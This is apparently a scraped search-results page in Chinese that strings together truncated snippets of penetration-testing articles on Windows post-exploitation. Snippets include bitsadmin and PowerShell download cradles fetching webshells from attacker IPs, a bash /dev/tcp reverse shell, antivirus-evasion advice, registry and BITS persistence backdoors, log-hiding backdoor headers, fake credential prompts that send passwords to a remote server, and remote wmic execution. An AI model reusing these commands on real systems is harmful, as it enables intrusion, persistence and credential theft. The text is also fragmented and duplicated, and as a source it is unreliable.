0x03 继续分析后台 因为这套系统是真的烂,所以我猜测后台的查询功能肯定也存在注入。如果权限够高的话,说不定可以直接上传shell呢。...不过事实证明我想多了,密码错误。(多数管理员会把各种密码设置成一个) 0x04 尝试通过sqlmap拿shell 因为可以执行命令,但是不能添加管理账号,估计是被eset拦截了。...找一个免杀的aspx一句话,然后放在自己的web服务器上,用bitsadmin下载这个aspx到目标上面 bitsadmin /transfer n http://111.111.111.111/m.aspx...copy e:\m.aspx e:\对方网站中文路径\二级路径\网站根目录\m.aspx 然后还是用bitsadmin下载到对方的服务上。...bitsadmin /transfer n http://111.111.111.111/s.bat e:\s.bat 现在我们查看一下是否下载成功,在sqlmap里面执行dir e:\ 接下来在sqlmap
必须是要连接的服务器上的管理员才能创建远程控制台连接。 ? 对于每个用户来说,默认的 .rdp 都作为隐藏文件存储在“我的文档”中。...-e 跳过字符来进入 telnet 客户端提示 -f 客户端登录的文件名 -l 指定远程系统上登录用的用户名称- -t 指定终端类型- host 指定要连接的远程计算机的主机名或...#2.addfile 将文件添加到指定的作业 bitsadmin /addfile bitsadmin /addFile #将文件添加到作业为您要添加的每个文件重复此调用...,如果多个作业使用myDownloadJob作为其名称,必须myDownloadJob用来唯一地标识该作业的作业的 GUID。...#下载多个文件命令实用案例 bitsadmin /create myDownloadJob #建立下载文件配置列表 bitsadmin /addfile myDownloadJob https://
本文主要介绍权限维持,介绍如何在有一定权限的情况下,留下后门。当然各类后门太多太多了,这里主要列举一些常用的、方便的。...bitsadmin bitsadmin也可以做启动项: bitsadmin /create backdoor bitsadmin /addfile backdoor %comspec% %temp%\...主要是遍历header头,如果带有Backdoor,则执行命令: ?...日志类 我们正常来访问一个文件,我们看到的是这么一条200的日志: ? 那如果我们加个header头呢?在日志里面看到的就是一条404的日志: ?...但是这样就算日志看起来是404,如果人家访问一下,直接能看到结果,可能还是不太好,那就再加个user-agent的判断: ? 流量层面 这里我以蚁剑为例。
\Unattended.xml C:\Windows\Panther\Unattended.xml 5.文件系统 可以通过调用系统预安装程序语言查看当前可访问目录或文件权限,如python下: import...os; os.system("cmd /c {command here}") 使用copy con命令创建ftp执行会话: 范例 C:\Users\thel3l> copy con ftp.bat #...创建一个名为ftp.bat的批处理文件 ftp # 输入执行会话名称,按回车到下一行,之后按CTRL+Z结束编辑,再按回车退出 C:\Users\thel3l> ftp.bat # 执行创建的文件 ftp...命令: 如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,bitsadmin是一个命令行工具,可用于创建下载上传进程: 范例 C:\Users\thel3l> bitsadmin...download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT} C:\Users\username\Downloads\{FILE_NAME.EXT} 如:
//bitsadmin下载文件 powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http...这里存放js的目录也是可以解析aspx的,我们可以执行命令全局搜索目标系统的js文件。...1.5.4 关杀软后把searchall丢到服务器上,收集一下敏感文件以及浏览器缓存的信息。这里从浏览器缓存中得到了服务器管理员的校园网账号密码。...','d:\1.bat')最后也是很顺利地绕过火绒添加了用户,远程连接成功。...3.2.3 满怀期待地去ossbrowser登录,点进去却发现云资产空空如也,并没有实例。得到了数据库密码,但数据库端口没有开放。扫了一下全端口也没有发现,于是没能往下继续。
[TOC] 0x00 前言 描述:作为一个网络安全从业者,您可能会常常在渗透测试中遇到只有一个Shell情况下如何将可执行文件上传到一台windows机器上(主要由于没有界面操作),我在实际渗透测试中将我的经验和方法进行分享.../demo.bat #关键语句 debug /?...描述:下载远程文件并保存指定目录(这里是用户的Download的目录:%Userprofile%\Downloads) > bitsadmin /transfer Downloadjob /download...来下载第三方工具,然后利用第三方工具进行传输文件 1)wget bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3...tftp.exe,然后利用tftp传输文件 bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update
[TOC] 0x00 前言 描述:作为一个网络安全从业者,您可能会常常在渗透测试中遇到只有一个Shell情况下如何将可执行文件上传到一台windows机器上(主要由于没有界面操作),我在实际渗透测试中将我的经验和方法进行分享.../demo.bat #关键语句 debug /?...描述:下载远程文件并保存指定目录(这里是用户的Download的目录:%Userprofile%\Downloads) > bitsadmin /transfer Downloadjob /download...来下载第三方工具,然后利用第三方工具进行传输文件 1)wget bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3...WeiyiGeek. 2) ftfp 思路同上,先通过bitsadmin下载tftp.exe,然后利用tftp传输文件 bitsadmin /transfer n http://www.winagents.com
必须是要连接的服务器上的管理员才能创建远程控制台连接。 ? 对于每个用户来说,默认的 .rdp 都作为隐藏文件存储在“我的文档”中。...#补充 start mstsc /v:192.168.1.1:3389 /console #在bat中进行执行 telnet 命令 描述:远程管理终端管理工具与端口探测命令,它是一个基于C/S模式的...-e 跳过字符来进入 telnet 客户端提示 -f 客户端登录的文件名 -l 指定远程系统上登录用的用户名称- -t 指定终端类型- host 指定要连接的远程计算机的主机名或...回车键 >quit #示例4.telnet端口卡死退出,如果遇到半天没有响应的如ssl端口。要强制退出可以通入门按键组合。...,如果多个作业使用myDownloadJob作为其名称,必须myDownloadJob用来唯一地标识该作业的作业的 GUID。
Winlogon Helper DLL后门 Winlogon是一个Windows组件,用来处理各种活动,如登录、注销、身份验证期间加载用户配置文件、关闭、锁定屏幕等。..." powershell下操作: Set-ItemProperty "HKCU:\Environment\" "UserInitMprLogonScript" "C:\1.bat" -Force bat...直接给出批处理文件: wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1...内部工具类 waitfor.exe 该工具用来同步网络中计算机,可以发送或等待系统上的信号。...如果是非管理员用户,用下面的方法修改注册表即可。
大部分情况下,一个cmdshell 已经可以满足我们继续渗透的需求,所以不到万不得已的时候最好不要远程桌面连接(mstsc),而是通过远程执行命令的方式继续开展工作。...@#123QWE "whoami /all" c$ 在远程系统上执行 bat 脚本(以管理员权限执行命令) test.exe 192.168.17.138 Administrator !...推荐使用 wmic 进行远程执行命令。 常用命令 在远程系统上执行 bat 脚本 wmic /node:192.168.17.138 /user:test /password:!...如果执行的命令比较复杂,比如命令中包含双引号,可以将命令写成 bat 脚本拷贝到远程系统上,然后远程执行 bat 脚本。...本文列出了常见远程执行命令的方法和技巧,我们使用的时候需要根据具体环境进行选择最合适的执行方式。小弟不才,如果文中有错误或者疏漏,希望各位表哥可以指出,万分感谢。
这是a.txt的内容,通过file_put_contents进行文件写入 ? 但是这样文件上传会有一个问题,就是他这里可能会拦截或者解析不到你的命令,只能解析phpinfo() ?...但是如果执行别的命令就不行,比如whoami ? 考虑把内容进行base64编码一下试试 ? 然后执行命令,就没有报错了,我们执行命令也要记得base64编码一下 ?...既然可以执行命令,我这里尝试了hta上线和powershell上线,可能因为机器是腾讯云的缘故给我拦截了,于是请教了3h师傅,他和我说可以使用Windows系统中的Certutil/Bitsadmin/...,首先看一下当前文件路径,然后将命令编码一下再执行。...总结:内网这块是3h师傅负责打的,思路很明确,当初在命令执行的时候考虑过直接创建用户,但是失败了就没再考虑,能执行系统命令的时候可以使用Windows自带的文件来下载工具,如目标有杀软时请自行做下免杀处理
当用户在假登录屏幕上输入密码时,他会在 AD 或本地执行验证,从而保证密码是正确的,用户输入时会将结果打印在控制台: ?...web 服务器,该程序会将结果发送至远程服务器,然后远程服务器将收到的结果保存在文本文件中,可以将 Powershell 的命令放在 bat 文件中执行,下载地址: https://github.com...在执行 BAT 文件之前,需要将服务器地址添加到相应的 powershell、php 文件中,执行之后在目标系统上显示的窗口如下: ? 只有当提供的凭据正确时,弹出窗口才会消失。...通配符 * 指示模块监视系统上运行的所有进程,只要有新的进程启动,就会弹出输入提示框: ?...输入提示框作为该进程需要认证作为提示展示给用户,要求输入凭证,如果设置的进程不合理,很容易被人发现异常: ? 当用户输入凭据时,捕获到凭证将显示在控制台: ?
不知道各位小伙伴在渗透中是否遇见过这个问题: 虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。...话不多说,例如这样场景: 在数据库连接后或者sqlmap注入连接os-shell后可执行命令: ? 其中包括杀软或某狗、某盾: ? 此时下载文件的各种命令均被拦截: bitsadmin: ?...此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例): ?...可在web站点写入文件后访问txt查看写入有无偏差: ?...还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。
当然,你也可以通过以下命令来远程执行命令,且无文件落地: powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring...Bitsadmin BITSAdmin是一个命令行工具,可用于创建下载或上传并监视其进度,自windows7 以上版本内置bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下...FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端,其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。...如果你想要使得目标主机CS上线,那么也可以通过CS来构造hta文件 ? ? ? 之后在本地启动一个HTTP服务: ?...如果目标主机有安装notpad那么你可以通过下面这种方式快速的从一个URL或者UNC路径当中下载文件到本地并执行来获取shell:首先,打开notpad++,之后点击"文件—>打开": ?
3.跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告。...和put方法用法都基本相同,但是上传速度send却要比put快很多 get :将ftp服务器上的文件下载到本地目标机器中 ?...kali上我们要用wine来执行(linux是不能运行window下的可执行文件的,必须借助于wine): wine exe2bat.exe nc.exe nc.txt ?...利用bitsadmin上传YY6 03.7.6 利用powershell 上传 bitsadmin 可以用来在windows 命令行下下载文件。...Windows Server2003和XP是没有bitsadmin的,Winc7及其之后的机器才有。bitsadmin 可以在网络不稳定的状态下下载文件,出错会自动重试,可靠性应该相当不错。 ?
,后期可能会加入其它方式 第三步:检测漏洞并执行命令 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。...当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。...反弹shell(linux) 采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1 的方式反弹 shell 反弹shell(Windows) 采用 bitsadmin 下载指定...URL 的 exe 文件并执行的方式获取 shell ?...获取Webshell 可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config
、标准输出的显示结果、标准错误的显示结果。...如果命令参数是由用户来输入的,对于 exec 函数来说是有安全性风险的,因为 Shell 会运行多行命令,比如 ’ls -l .;pwd,如逗号分隔,之后的命令也会被系统运行。...Windows 在Windows上执行一个 .bat 或者 .cmd 文件的方式略有不同。...假如有一个bat文件 my.bat spawn const spawn = require('child_process').spawn; const bat = spawn('cmd.exe', ['...=> { if (err) { console.error(err); return; } console.log(stdout); }); 如果文件名中有空格: const
语法 解释 echo 表示打印该命令后的字符,如echo hello执行后会打印“hello” echo off 表示在此语句后所有运行的命令都不显示命令本身 ,但本身会显示 @ 与echo off相象...,但它是加在每个命令行的最前面,表示运行时不显示这一行的命令行(只能影响当前行) @echo off 组合上两个语法,表示不显示后续执行命令及当前命令 dir c:*.* >a.txt 将c盘文件列表写入...a.txt call 用于调用另一个批处理命令或文件(如果不用call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令) call c:\ucdos\ucdos.bat...调用ucdos.bat脚本 pause 暂停批处理的执行并在屏幕上显示Press any key to continue...的提示,等待用户按任意键后继续 rem 用于注释,也可以用 ::代替 start...hexo-deploy.bat 写在最后 所谓好的工具都是为了提高效率而生的,后续本人可能要维护多个平台的文章发表,所以计划用Python写一些自动化发布文章的脚本,然后再结合bat脚本进行调用,感兴趣的小伙伴欢迎继续关注
是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local system有权读写修改。...waitfor 关于waitfor手册中是这么解释的: 在系统上发送或等待信号。waitfor可用于跨网络同步计算机。..._dl PS:如果Installer文件夹不存在,则依次创建Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E} ?...举个例子来说,位图文件(BMP文件)在Windows中的默认关联程序是“图片”,如果将其默认关联改为用ACDSee程序来打开,那么ACDSee就成了它的默认关联程序。...如果我们想让任务完成,可以执行bitsadmin /complete test,calc.exe也会复制到桌面上 ?
领取专属 10元无门槛券
手把手带您无忧上云